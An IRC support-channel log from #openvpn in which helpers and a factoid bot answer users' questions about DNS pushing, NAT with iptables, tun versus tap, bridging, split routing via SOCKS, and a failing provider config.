264 seconds] 02:38 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has joined #openvpn 02:39 < Wulf> Dennis84: hi 02:40 < Wulf> Dennis84: looks like race conditions where timed events are involved. Will have another look at it on the weekend 02:41 -!- Mcloven__ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 02:43 -!- knobo [~user@ti0125a380-1018.bb.online.no] has quit [Disconnected by services] 02:52 < Dennis84> Wulf: ok great 02:53 < Dennis84> thanks alot :) 03:00 -!- ben1066 [~quassel@unaffiliated/ben1066] has quit [Read error: Connection reset by peer] 03:04 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 03:23 -!- zz_AsadH is now known as AsadH 03:27 -!- Webhostbudd_ [~Webhostbu@c-24-7-197-240.hsd1.il.comcast.net] has quit [Quit: Leaving] 03:30 -!- Varazir [~mircwars@c-94-255-130-47.cust.bredband2.com] has quit [Ping timeout: 240 seconds] 03:33 -!- mete [~mete@mete.shell.la] has joined #openvpn 03:38 -!- dekroning [~dekroning@185.10.50.9] has joined #openvpn 03:39 < dekroning> how does openvpn redirect all traffic throught the vpn? because I don't see my default route changed, when i'm connected as a client 03:43 -!- Varazir [~mircwars@c-94-255-130-47.cust.bredband2.com] has joined #openvpn 03:44 < Wulf> dekroning: why do you think that it routes the traffic through your vpn? 03:53 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 03:55 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 03:55 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 03:56 -!- JSharpe [~JSharpe@46.165.221.13] has joined #openvpn 03:59 -!- newbie [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 03:59 -!- newbie is now known as Guest48444 04:04 -!- dekroning [~dekroning@185.10.50.9] has quit [Ping timeout: 255 seconds] 04:05 -!- CowboyPride [~chatzilla@unaffiliated/cowboypride] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0/20130215130331]] 04:06 -!- dekroning [~dekroning@vpn.cttinnovations.net] has joined #openvpn 04:12 -!- Guest48444 [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Quit: KVIrc 4.0.2 Insomnia http://www.kvirc.net/] 04:12 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 04:31 -!- dekroning [~dekroning@vpn.cttinnovations.net] has quit [Read error: Connection reset by peer] 04:31 -!- dekroning [~dekroning@D57E6B92.static.ziggozakelijk.nl] has joined #openvpn 04:31 -!- kmmndr [~tomtom@bro67-2-82-227-110-8.fbx.proxad.net] has joined #openvpn 04:31 < kmmndr> hi all :-) 04:34 -!- dekroning [~dekroning@D57E6B92.static.ziggozakelijk.nl] has quit [Read error: Operation timed out] 04:34 < kmmndr> We are using openvpn on debian, that's almost perfect for our needs excepts one thing 04:34 < kmmndr> I haven't found any way to push DNS rule 04:34 < kmmndr> push "dhcp-option DNS .." doesn't seems to work 04:35 < kmmndr> has anyone ever experienced such problem ? 04:35 < MacGyver> Right, so, since my questions yesterday were unanswered: 04:35 < MacGyver> First, if I run OpenVPN on the client not in daemon mode, and drop privileges after startup, how can I ever get it to cleanly remove its routes when closing the tunnel using ctrl+C? 04:35 < MacGyver> Second, suppose I'm on a network whose DNS I want to continue to use, but *only* for the domain "localdomain", and for all others I want to use the pushed DNS. Furthermore, as soon as the VPN closes, the domains DNS-server should be used again for all domains. Is there any easy way to do that, or am I going to have to use dnsmasq or similar solutions? 04:36 -!- dekroning [~dekroning@vpn.cttinnovations.net] has joined #openvpn 04:38 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 04:40 -!- dekroning [~dekroning@vpn.cttinnovations.net] has quit [Read error: Connection reset by peer] 04:41 -!- dekroning [~dekroning@vpn.cttinnovations.net] has joined #openvpn 05:09 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:13 -!- idlecool [~i@sd.gs] has left #openvpn ["Linkinus - http://linkinus.com"] 05:18 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds] 05:27 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds] 05:30 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:32 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 05:34 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds] 05:35 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:38 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 05:40 -!- abec0 [olivier@vvma.net] has joined #openvpn 05:41 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds] 05:44 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 05:44 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 276 seconds] 05:46 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 05:49 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 260 seconds] 05:55 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Quit: Computer has gone to sleep.] 05:59 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 06:22 < kisom> Morning 06:35 -!- dekronin1 [~dekroning@D57E6B92.static.ziggozakelijk.nl] has joined #openvpn 06:38 -!- dekroning [~dekroning@vpn.cttinnovations.net] has quit [Ping timeout: 245 seconds] 06:38 <@EugeneKay> MacGyver - magic, basically. 06:38 <@EugeneKay> !unpriv 06:38 <@vpnHelper> "unpriv" is see https://community.openvpn.net/openvpn/wiki/UnprivilegedUser for a write-up by EugeneKay on how to run OpenVPN without root/admin permissions. 06:39 <@EugeneKay> MacGyver - for the second question; no, you'll need to use something protocol-aware. My experience is that dnsmasq is a pile of turds; your mileage may vary. 06:40 -!- dekronin1 [~dekroning@D57E6B92.static.ziggozakelijk.nl] has quit [Ping timeout: 250 seconds] 06:40 -!- dekroning [~dekroning@vps3.cttinnovations.net] has joined #openvpn 06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 06:48 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:53 -!- dekronin1 [~dekroning@D57E6B92.static.ziggozakelijk.nl] has joined #openvpn 06:56 -!- dekroning [~dekroning@vps3.cttinnovations.net] has quit [Ping timeout: 248 seconds] 06:56 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has joined #openvpn 06:58 -!- dekronin1 [~dekroning@D57E6B92.static.ziggozakelijk.nl] has quit [Read error: Connection reset by peer] 07:04 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 260 seconds] 07:06 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:06 < kmmndr> any idea for DNS push ? 07:06 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 07:07 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:21 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Ping timeout: 276 seconds] 07:23 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 07:24 <@dazo> kmmndr: look at update-resolv scripts ... http://openvpn.git.sourceforge.net/git/gitweb.cgi?p=openvpn/openvpn-testing.git;a=tree;f=contrib/pull-resolv-conf/contrib/pull-resolv-conf;h=abb075de953ce2303bcf39ea8d265f008f152c91;hb=HEAD 07:24 <@vpnHelper> Title: SourceForge - openvpn/openvpn-testing.git/tree - contrib/pull-resolv-conf/contrib/pull-resolv-conf/ (at openvpn.git.sourceforge.net) 07:30 < kmmndr> dazo: thank you :- 07:30 < kmmndr> :-) 07:40 < kmmndr> dazo: that's a client side modification for linux 07:41 < kmmndr> but we also have windows clients 07:41 <@dazo> for windows you don't need that ... just push the DNS info, and the windows clients pick it up 07:42 < kmmndr> I'll try again on windows 07:42 < kmmndr> dazo: thanks :-) 07:50 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 07:57 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 07:59 -!- levifig [~levifig@spwn.co] has joined #openvpn 08:17 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 245 seconds] 08:17 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 08:19 -!- levifig [~levifig@spwn.co] has joined #openvpn 08:26 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 08:33 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 08:37 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 08:45 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:04 -!- cafaroo [~gustaf@c80-216-25-207.bredband.comhem.se] has quit [] 09:11 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has joined #openvpn 09:27 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 09:27 -!- mode/#openvpn [+o krzee] by ChanServ 09:29 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 09:39 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:41 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 09:43 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 09:51 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Read error: Operation timed out] 10:17 -!- HyperGlide [~HyperGlid@182.149.50.45] has joined #openvpn 10:18 -!- n00 [~n00@130.225.74.204] has joined #openvpn 10:19 < n00> !welcome 10:19 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 10:19 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 10:19 < n00> !route 10:19 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs behind 10:19 <@vpnHelper> the server or client 10:21 < n00> !serverlan 10:21 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 10:22 < n00> !goal 10:22 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 10:32 -!- JacquesBH [~jacques@unaffiliated/jacquesbh] has joined #openvpn 10:32 < JacquesBH> Hi all :) 10:33 < JacquesBH> Yeah, I love IRC, because when you need something... there's always a chan 10:33 < JacquesBH> Hum, I'm on Mac. (Mountain Lion) and I've a Debian server... I tried to configure the OpenVPN server but it doesn't work 10:34 < JacquesBH> (on client) 10:34 <@ecrist> you're the one that just posted on twitter 10:35 < JacquesBH> yes :) 10:35 <@ecrist> !logs 10:35 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 10:36 <@ecrist> !configs 10:36 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 10:36 < JacquesBH> ok right. I'll do it now. 10:40 < JacquesBH> ecrist: server config http://pastebin.com/9B89Rjtz OpenVPN 2.1.3 x86_64-pc-linux-gnu [SSL] [LZO2] [EPOLL] [PKCS11] [MH] [PF_INET6] [eurephia] built on Feb 21 2012 10:41 <@ecrist> JacquesBH: OpenVPN 2.3.0 is latest. what you're using is really quite old 10:42 < JacquesBH> debian packages... 10:42 < pekster> !repo 10:42 <@vpnHelper> "repo" is openvpn runs some software repositories for your installing pleasure, http://community.openvpn.net/openvpn/wiki/OpenvpnSoftwareRepos 10:42 < JacquesBH> Ok I update my sources 10:42 < JacquesBH> then get back here with result :) thks 10:42 < pekster> That may not be the cause of your issue, but keep in mind that version is years out of date 10:42 < pekster> (in fact, unless you're trying to use a 2.2 or 2.3 centric feature, that's likely not the cause of your problem) 10:42 <@ecrist> no sense in starting your journey already out of date 10:43 < pekster> Yea 10:43 < pekster> Could be worse; I've seen 2.0.9 in here before :) 10:43 < pekster> Oh, and a case of 1.x too 10:43 <@ecrist> pekster: when I started this channel, that was current 10:43 <@ecrist> 2.0.9 was, not 1.x 10:44 < pekster> Yea, I remember the 2.0.9 days. And some build systems ~4 years back that had 2.0.9 as thte most recent version it supported without sorcery and goats 10:44 < pekster> At the time they were "only" 2 years out of date 10:46 < JacquesBH> ecrist: ok, updated, OpenVPN 2.3.0 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [EPOLL] [PKCS11] [eurephia] [MH] [IPv6] built on Mar 1 2013 10:46 < JacquesBH> I'll try again to connect.. 10:46 < JacquesBH> So the problem is... I can connect, but DNS doesn't seem work 10:46 <@ecrist> right 10:47 <@ecrist> !configs 10:47 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 10:47 <@ecrist> need to see a client config as well as server 10:48 <@ecrist> JacquesBH: Are you configuring NAT on the server for VPN clients to get to the internet? 10:49 < JacquesBH> I just need a proxy... but Maybe later I'll use it for a network drive 10:49 <@ecrist> well, you're pushing redirect gateway, but not natting traffic for your users to get to the internet 10:49 < JacquesBH> ecrist: here the client http://pastebin.com/cKKSZ1Pr 10:49 <@ecrist> remove that line from your config, and things should "just work" 10:50 <@ecrist> you just want vpn clients to get to your 10.4.0.0/24 network, right? 10:50 < JacquesBH> hum... maybe :p I don't relly know 10:50 <@ecrist> !goal 10:50 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 10:50 < JacquesBH> It's the first time I use openvpn :) 10:51 < JacquesBH> Ok, I need to access the internet over the VPN :) 10:51 < JacquesBH> for now it's the main goal 10:51 <@ecrist> ok, then you need to setup NAT 10:51 <@ecrist> this is a debian box? 10:51 < JacquesBH> yep 10:51 <@ecrist> I know nothing of debian, but this might work for you: 10:51 <@ecrist> !linnat 10:51 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 10:52 < JacquesBH> hum... Can I pastebin my firewall ? :) 10:52 <@ecrist> we don't actually do firewall support in here 10:54 < pekster> #netfilter is the right place to go for netfilter/iptables tasks 10:54 < JacquesBH> Yes I know, but the last lines are for openvpn... I'm not sure about those lines because I found lot of stuff... http://pastebin.com/2LkKfAsk 10:54 < pekster> They also have some very good tutorials/info links in the first /TOPIC URL 10:54 < JacquesBH> ok I go on 10:54 <@ecrist> if you follow the vpnHelper comment, you should be able to figure it out, though. 10:54 -!- raidz_away is now known as raidz 10:55 < JacquesBH> I'm reading and trying same time 10:57 < JacquesBH> ecrist: so actually my iptables are empty 10:57 < JacquesBH> http://pastebin.com/rdRWUNtf 10:58 <@ecrist> be back in about an hour 10:58 -!- AsadH is now known as zz_AsadH 10:59 < JacquesBH> ok well 11:01 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Ping timeout: 248 seconds] 11:01 < n00> Hi guys, i'm trying to setup a "road-warrior"-setup, where the client is connected to the same subnet as our workstations(172.23.23/24). I'm running the OpenVPN server on a box with 2 NICs, the incomming connection is accepted on NIC1 (public ip), and i have bridged the second NIC eth1 with tap0 in br0. I can connect the client, and it is assigned a IP in the 172.23.23/24 subnet via openvpn 11:01 < n00> dchp. From the client I can ping the br0 ip - but i can ping local workstations. Furthermore from the server "ping -i br0 workstationIP" works fine. Any ideas on where to begin troubleshooting? 11:01 < n00> *but i CANT ping local workstations 11:02 < pekster> Probably the firewall on the VPN server not allowing the VPN clients to ping 11:02 < pekster> Any reason to bridge? routing is generally more efficient and less complicated 11:02 < pekster> !tunortap 11:02 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 11:03 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 11:03 < JacquesBH> guys ( ecrist ) it works :') 11:04 < JacquesBH> it seems that empty iptables is not good... I relaunch my firewall and it works... I'm so bad. 11:05 < n00> pekster: not having to setup WINS, which I believe is depreciated ? 11:05 < pekster> So you're using bridging so NBNS broadcasts "just work" intead of setting up a proper DNS infrastructure? 11:06 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 11:07 < pekster> You don't need WINS even on a Windows network with correctly configured/managed DNS 11:07 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:07 < Valcorb> rb 11:09 < n00> pekster: let's say I have a correct DNS setup, which mode (routed/brigded) should i use if I want users to access windows shares ? 11:10 -!- Porkepix [~Porkepix@157.138.190.113] has joined #openvpn 11:15 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 11:16 -!- levifig [~levifig@spwn.co] has joined #openvpn 11:19 < n00> pekster: is it correctly understod that windows shares will work fine over routed 11:20 < pekster> Yup 11:21 < n00> pekster: and without WINS also? 11:21 < pekster> Although Windows does dumb things if you expect unqualifiedi names to resolve. Solutions include hacking around the "undocumented features" of the so-called 'DNS Search Suffix List' or using FQDNs along with your DNS setup 11:21 < pekster> Yes 11:22 < pekster> I've personally set up remote-access VPNs for a Windows domain without WINS in a routed setup 11:22 < pekster> So it can surely be done 11:23 < n00> well that was nice to hear indeed! I would much rather just VPN layer3 traffic 11:23 -!- HyperGlide [~HyperGlid@182.149.50.45] has quit [Remote host closed the connection] 11:24 < pekster> You'll generally need to push the internal DNS along with the domain name via the dhcp-option parameter. And if you'd better have some script-fu to get unqualififed stuff working 11:24 < pekster> I recommend against using unqualified names anyway if you run split-horizon DNS 11:28 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 11:30 < n00> Okay cool. But regarding the bridged-mode solution, i'm kinda suspecting that my clients don't get a correct route to the IP's on the VPN'ed subnet. As far as I know i don't need to d any route push'ing when using bridged, is that correct? 11:33 < pekster> Right, it'll appear as on-link (assuming you fed them the right info via DHCP using --server-bridge or your on-subnet DHCP server, whatever you're using) 11:33 < pekster> You either have a firewall problem, or possibly a clash with the local network on the client side 11:38 < n00> pekster : yep it appears as on link(which is correct?). What could a "clash" be e.g? 11:39 < n00> pekster: btw. will I in a bridged mode, need ip_forwarding? 11:39 -!- Porkepix [~Porkepix@157.138.190.113] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 11:39 < pekster> rfc1918 is not globally unique; nothing stops a remote LAN from using (part of) the same network 11:41 < pekster> You shouldn't need forwarding unless you want to expose other networks, but most OS's have a knob to allow firewalling on bridges 11:41 < n00> ah okay that kind of clash, that shouldn't be the problem 11:42 < n00> pekster: say i want the VPN client(172.23.23/24) to access a server on 172.22.22/24, and normal workstations on the 23.23 can access the servers. - Would i then need it? 11:43 -!- Porkepix [~Porkepix@157.138.190.113] has joined #openvpn 11:43 < pekster> !ipforward 11:43 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 11:46 < n00> this might be a silly question, but what about from well.. br to eth? 11:46 < n00> when tap0 and eth1 (access to client network) are bridged in br0 11:48 < pekster> br0 is the interface. Any bridge members are not "interfaces" as far as the OS cares at that point, just physical ports 11:48 < pekster> Think of it like a switch, becuase that's what you have when you bridge 11:49 < pekster> So no, you don't need to enable L3 forwarding whwen you've create an L2 device. Maybe your firewall interferes with it, in which case you need to go fix your firewall 11:50 < n00> Okay, thank you very much for your help, I really appreciate it! Have a nice day :) 11:50 < n00> I will probably be back ;) 11:51 -!- n00 [~n00@130.225.74.204] has quit [] 11:55 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Ping timeout: 248 seconds] 12:00 -!- _d4vid [~stern@pdpc/supporter/student/d4vid] has joined #openvpn 12:00 < _d4vid> hello all 12:04 < _d4vid> i have a question .. 12:04 < _d4vid> my english is not so good 12:04 < _d4vid> can anyone speak russian or german? 12:05 < Azrael_-> <- ger, but i'm just a starter 12:06 < _d4vid> also mein wunsch ist .. dat ich an geschwindigkeit von meinem isp nicht verliere deswegen wollte ich es irgendwie auf youtube und zatto und paar andere seiten begrenzen damit fuer die der traffik ueber vpn lauft und restliche ueber meinen isp 12:08 < _d4vid> ich habe was im google gefunden z.b. wie split routing 12:08 < _d4vid> ich habe aber davon wenig ahnung 12:17 -!- master_of_master [~master_of@p4FF24B3D.dip.t-dialin.net] has joined #openvpn 12:17 < MacGyver> _d4vid: Ist es okay auf Englisch zu antworten? 12:18 < _d4vid> ok sorry 12:18 < MacGyver> _d4vid: Don't apologize. 12:18 < MacGyver> _d4vid: My German isn't good enough to answer you in German. 12:19 < MacGyver> _d4vid: But what you need, if I understand your problem correctly, is to add routes for traffic to youtube, zatto and the other sites to go through the VPN, the tun0-device, but leave all other routes untouched. 12:19 < _d4vid> moment i try it to translate with google.. 12:20 -!- master_o1_master [~master_of@p4FF24C6C.dip.t-dialin.net] has quit [Ping timeout: 245 seconds] 12:20 < MacGyver> Everyone else who doesn't speak German: He wants to keep the speed his ISP gives him, and therefore he *only* wants youtube, zatto and a few other sites to go through the VPN. 12:20 < _d4vid> yes that corerrect ) 12:21 < MacGyver> I don't know if it's easy or even possible to do this, since youtube has a lot of different addresses... Someone else will have to comment on that. 12:22 < _d4vid> ok 12:23 < JacquesBH> Guys, last hour I found a solution to purpose to use my VPN for Internet forward only... now I want to use the VPN for a network drive... I searched but maybe I do not use the good words... 12:23 * ecrist returns 12:25 <@krzee> JacquesBH, 12:25 <@krzee> network drive is on a machine in server lan? client lan? the server itself? a client itself? 12:26 < JacquesBH> krzee: the server itself 12:27 <@krzee> you dont need to do anything except allow them to reach the share by VPN ip 12:27 < JacquesBH> hum... howto do that? 12:28 <@krzee> unrelated to openvpn 12:28 <@krzee> you only want a client to access the drive, right? 12:29 < JacquesBH> hum right 12:29 < JacquesBH> (sorry i'm on tel... -_-) 12:29 <@krzee> so just connect to the share on the servers vpn ip 12:33 <@EugeneKay> _d4vid - You can kind of do what you want if you use two browsers. Set one up to use a SOCKS proxy via the VPN, and just browse the internet normally with the other. 12:33 <@EugeneKay> !routebyapp 12:33 <@vpnHelper> "routebyapp" is if you want to send only certain apps over the VPN you need to run a socks server on the internal VPN subnet (see !sockd) then get an app like proxifier (windows, osx) or tsocks (linux, BSD) to selectively route traffic over the socks proxy based on port/app/subnet or any combination. 12:36 < _d4vid> thanks how do i set that traffic dont use all 12:36 <@EugeneKay> Just use the right web browser for the site you want ;-) 12:37 < JacquesBH> krzee: I think I need to install something like samba on the server, right? 12:37 <@ecrist> or you can use Fuse with SSHFS 12:37 <@krzee> samba needs to listen on the vpn ip 12:38 <@krzee> whether or not that requires configuring samba is for you to know 12:38 < pekster> _d4vid: Browser plugins like "FoxyProxy" for Firefox can use a proxy for specific URLs. You can configure that plugin to send your youtube and other URLs to that proxy and let normal web traffic go out your ISP 12:38 < _d4vid> EugeneKay, so i connect to openvpn and i have all traffic over my eth0 its set automaticly 12:38 < JacquesBH> ecrist: but my collegues are on Windows.. :') 12:39 <@EugeneKay> _d4vid - no; you don't do that at all. Have just one browser connect to a SOCKS proxy via the VPN. 12:39 <@EugeneKay> Everything else goes normally 12:39 <@ecrist> JacquesBH: samba is pretty simple 12:39 < _d4vid> but what i need to change in client config of openvpn? 12:39 <@EugeneKay> You would set up a basic config that just provides networking 12:39 <@EugeneKay> No routing etc 12:43 < _d4vid> EugeneKay, u mean like this howto? http://www.niteoweb.com/blog/openvpn-over-ssh 12:43 <@vpnHelper> Title: OpenVPN over SSH — NiteoWeb Ltd. (at www.niteoweb.com) 12:43 <@EugeneKay> Nope. 12:43 <@EugeneKay> Just the basic minimum configuration needed for openvpn's networking 12:48 < _d4vid> ssh -D 127.0.0.1:8080 username ? 12:48 <@EugeneKay> openvpn config, not SSH ;-) 12:48 <@EugeneKay> Just follow the openvpn howto to the point where you can ping the VPN IP of each end 12:56 < _d4vid> openvpn server config or client? 12:57 < _d4vid> but i dont have any rights of openvpn server 13:00 <@ecrist> we can only help server admins, generally 13:01 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has joined #openvpn 13:01 < sanfran> i'm on Debian, trying to set up privateinternetaccess, stuck on step 7 https://www.privateinternetaccess.com/pages/client-support/#ubuntu_openvpn 13:01 <@vpnHelper> Title: Client Support Area | Private Internet Access VPN Service (at www.privateinternetaccess.com) 13:02 < pekster> !provider 13:02 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 13:02 < sanfran> my problem is understanding and using the program openvpn. 13:03 < pekster> Not if you're trying to follow directions telling you to use network manager 13:03 < pekster> !netman 13:03 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list 13:03 <@ecrist> !ubuntu 13:03 <@vpnHelper> "ubuntu" is dont use network manager! 13:03 < pekster> Ah, I like that one better :) 13:04 <@ecrist> that is one of the oldest factoids in the database 13:04 < sanfran> pekster: could *you* talk to me? 13:04 < pekster> I don't deal with network manager for openvpn. I tried it once years ago and it failed miserably at what I wanted it to do 13:05 < sanfran> pekster: great. what do you use? 13:05 < pekster> /usr/sbin/openvpn 13:05 < sanfran> indeed, that's what i'm trying to use. 13:05 <@ecrist> factoid #28 out of 341 current factoids 13:05 < sanfran> as i said before. 13:06 <@ecrist> sanfran: did privateinternetaccess provide you with an openvpn config? 13:06 -!- _d4vid [~stern@pdpc/supporter/student/d4vid] has left #openvpn ["http://incloak.com"] 13:07 * sanfran checks for this... 13:07 < sanfran> i have lots of .ovpn files 13:08 < sanfran> i'm assuming it want East.ovpn since I'm in New England? 13:10 <@ecrist> try any of them with a simple: openvpn --config 13:13 < sanfran> i'm so close now :) but OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables 13:14 <@ecrist> pastebin the config, minus any certificates within 13:17 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 13:19 < sanfran> http://pastebin.com/6UZvgY8j 13:20 <@ecrist> pastebin your client log, pleas 13:20 <@ecrist> the script-security thing is just a warning 13:21 < sanfran> where is that log? 13:21 < pekster> You'll want a lot at more than 'verb 1' 13:21 < pekster> Make that 'verb 4' or add --verb 4 after the --config command-line 13:21 < pekster> log at* 13:22 <@ecrist> so, openvpn --config --verb 4 --log /tmp/foo.log 13:23 <@ecrist> then your log will be in /tmp/foo.log 13:23 <@ecrist> feel free to look here, too 13:23 <@ecrist> !man 13:23 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 13:32 < sanfran> Fri Mar 8 14:32:54 2013 us=792461 Cannot load CA certificate file ca.crt path (null) (SSL_CTX_load_verify_locations): error:02001002:system library:fopen:No such file or direc$ 13:33 < sanfran> it's becuase i moved it as su, isn't it? 13:34 <@ecrist> I asked for the entire log, but, the ca.crt file isn't where it's supposed to be according to the config 13:35 < sanfran> that's the only error, i thought i'd save you the time. 13:35 <@ecrist> usually people think that and they're wrong 13:35 